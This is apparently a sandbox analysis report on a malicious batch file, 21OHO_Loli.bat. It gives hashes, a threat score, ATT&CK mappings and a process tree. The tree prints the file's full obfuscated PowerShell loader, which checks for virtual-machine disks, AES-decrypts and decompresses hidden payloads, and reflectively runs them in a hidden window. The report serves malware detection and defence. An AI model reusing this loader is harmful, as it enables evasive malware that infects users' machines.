9efff51d5998c14eb13cb1678ed726f80c98dd600dcebe6fc2270066909149c0

General

Target

21OHO_Loli.bat
Size

7.3MB
MD5

a09e8faa772f0db8527331f7a5420154
SHA1

fade919d96f8e44dca8d69a38570ee6ae31ab00e
SHA256

9efff51d5998c14eb13cb1678ed726f80c98dd600dcebe6fc2270066909149c0
SHA512

996e04fea10be101995214c005ed800d6ba3ae09acdb538240f43ca0f6dd9133895e32fa7c25a54d49b0e68b88cc8bc4e47d6c12e87b592130eb9a2294dc8174
SSDEEP

49152:Z8bxEQwP1/DFJYlW+qqW6pVXELMq8OoWLxixS7JaafipmP8BJjRQvyLdomw+l4uT:A

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2460	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2460	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 856 wrote to memory of 1788	856	cmd.exe	32
PID 856 wrote to memory of 1788	856	cmd.exe	32
PID 856 wrote to memory of 1788	856	cmd.exe	32
PID 856 wrote to memory of 2184	856	cmd.exe	33
PID 856 wrote to memory of 2184	856	cmd.exe	33
PID 856 wrote to memory of 2184	856	cmd.exe	33
PID 856 wrote to memory of 2352	856	cmd.exe	34
PID 856 wrote to memory of 2352	856	cmd.exe	34
PID 856 wrote to memory of 2352	856	cmd.exe	34
PID 856 wrote to memory of 2460	856	cmd.exe	35
PID 856 wrote to memory of 2460	856	cmd.exe	35
PID 856 wrote to memory of 2460	856	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\21OHO_Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1788
- C:\Windows\system32\findstr.exe
  findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
  2⤵
  PID:2184
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function ZStu($yQaj){ Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$jlmx=Pk[PkSPkyPkstPkemPk.PkSPkePkcuPkriPktPkyPk.PkCrPkypPktPkoPkgrPkaPkpPkhPky.PkAPkePksPk]:Pk:CPkrPkePkatPke(Pk)Pk;'.Replace('Pk', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$jlmx.VuMVuoVudVue=Vu[SVuyVusVutVuemVu.SVueVucVuuVuriVutyVu.VuCVuryVupVutVuoVugrVuaVupVuhVuy.VuCiVupVuhVuerVuMoVudVueVu]Vu:Vu:VuCVuBVuC;'.Replace('Vu', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug -InformationAction Ignore '$jlmx.tFPtFatFdtFditFngtF=tF[tFStFystFtetFmtF.tFStFectFurtFitFttFy.tFCtFrtFytFpttFotFgtFrtFaptFhytF.tFPtFadtFditFntFgtFMtFotFdtFetF]tF::tFPtFKtFCStF7tF;'.Replace('tF', ''); Invoke-Expression -Verbose -Debug -WarningAction Inquire '$jlmx.DnKDneDnyDn=[DnSyDnsDntDneDnm.DnCoDnnDnvDneDnrtDn]:Dn:DnFDnroDnmDnBDnaDnseDn6Dn4DnSDntrDninDng("DnADnzDnjDnTxDnFsDnCDnBDn9Dn1gDntnDnZDntDn2DnU3Dnc5DnDDnfDnH+DnQDnSDnlDn4uDnsDnCDnWDndiDnrVDnyDnUDnr/DnEsDn=Dn");'.Replace('Dn', ''); Invoke-Expression -Debug '$jlmx.IwIIwVIw=Iw[SIwysIwtIweIwmIw.CIwonIwvIweIwrIwt]Iw::IwFIwrIwomIwBIwaIwsIwe6Iw4IwSIwtIwriIwngIw("IwkIwcIwkIwARIwgLIwXIwMIwrIwNMIwFWIw3IwLIwdIwgQIw2wIwQIw=Iw=");'.Replace('Iw', ''); $uiiJ=$jlmx.CreateDecryptor(); $djuB=$uiiJ.TransformFinalBlock($yQaj, 0, $yQaj.Length); $uiiJ.Dispose(); $jlmx.Dispose(); $djuB;}function gnob($yQaj){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$lvgf=MhNMheMhwMh-OMhbjMheMhcMhtMh SMhysMhtMheMhmMh.IMhO.MhMMheMhmoMhrMhyMhSMhtrMheMhaMhm(,$yQaj);'.Replace('Mh', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$zDyo=MhNMheMhwMh-OMhbjMheMhcMhtMh SMhysMhtMheMhmMh.IMhO.MhMMheMhmoMhrMhyMhSMhtrMheMhaMhm;'.Replace('Mh', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$ePUA=NYNNYeNYwNY-ONYbjNYeNYcNYtNY SNYysNYtNYeNYmNY.INYO.NYCNYoNYmpNYrNYeNYsNYsiNYoNYnNY.NYGZNYipNYSNYtNYreNYamNY($lvgf, NY[NYINYONY.CNYomNYpNYrNYeNYssNYioNYnNY.NYCNYomNYprNYeNYsNYsiNYoNYnNYMNYodNYeNY]NY:NY:DNYecNYoNYmNYprNYesNYsNY);'.Replace('NY', ''); $ePUA.CopyTo($zDyo); $ePUA.Dispose(); $lvgf.Dispose(); $zDyo.Dispose(); $zDyo.ToArray();}function wOXj($yQaj,$IKqu){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$WeWk=js[jsSjsyjsstjsemjs.jsRjsejsfljsecjstjsijsojsn.jsAsjssjsejsmbjsljsyjs]js::jsLjsojsajsd([byte[]]$yQaj);'.Replace('js', ''); Invoke-Expression -Verbose -WarningAction Inquire '$kAro=$WeWk.ScEScnSctScryScPoSciScnSct;'.Replace('Sc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$kAronV.nVInVnnVvonVkenV(nV$nVnnVulnVl, $IKqu);'.Replace('nV', '');}$KTCS = 'C:\Users\Admin\AppData\Local\Temp\21OHO_Loli.bat';$host.UI.RawUI.WindowTitle = $KTCS;$hPoX=[System.IO.File]::ReadAllText($KTCS).Split([Environment]::NewLine);foreach ($tYGY in $hPoX) { if ($tYGY.StartsWith('bgdrL')) { $jpHj=$tYGY.Substring(5); break; }}$yBNa=[string[]]$jpHj.Split('\');Invoke-Expression -Debug -InformationAction Ignore '$VsR = gnob (ZStu (TH[THCTHoTHnvTHerTHtTH]TH:TH:FTHroTHmTHBTHaTHseTH64THSTHtTHriTHnTHg($yBNa[0].Replace("#", "/").Replace("@", "A"))));'.Replace('TH', '');Invoke-Expression -Debug '$oNx = gnob (ZStu (TH[THCTHoTHnvTHerTHtTH]TH:TH:FTHroTHmTHBTHaTHseTH64THSTHtTHriTHnTHg($yBNa[1].Replace("#", "/").Replace("@", "A"))));'.Replace('TH', '');Invoke-Expression -Verbose -Debug -InformationAction Ignore -WarningAction Inquire '$tEq = gnob (ZStu (TH[THCTHoTHnvTHerTHtTH]TH:TH:FTHroTHmTHBTHaTHseTH64THSTHtTHriTHnTHg($yBNa[2].Replace("#", "/").Replace("@", "A"))));'.Replace('TH', '');wOXj $VsR $null;wOXj $oNx $null;wOXj $tEq (,[string[]] (''));
  2⤵
  PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2460-4-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp

Filesize
4KB

Download
memory/2460-5-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/2460-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2460-7-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-8-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-9-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-10-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing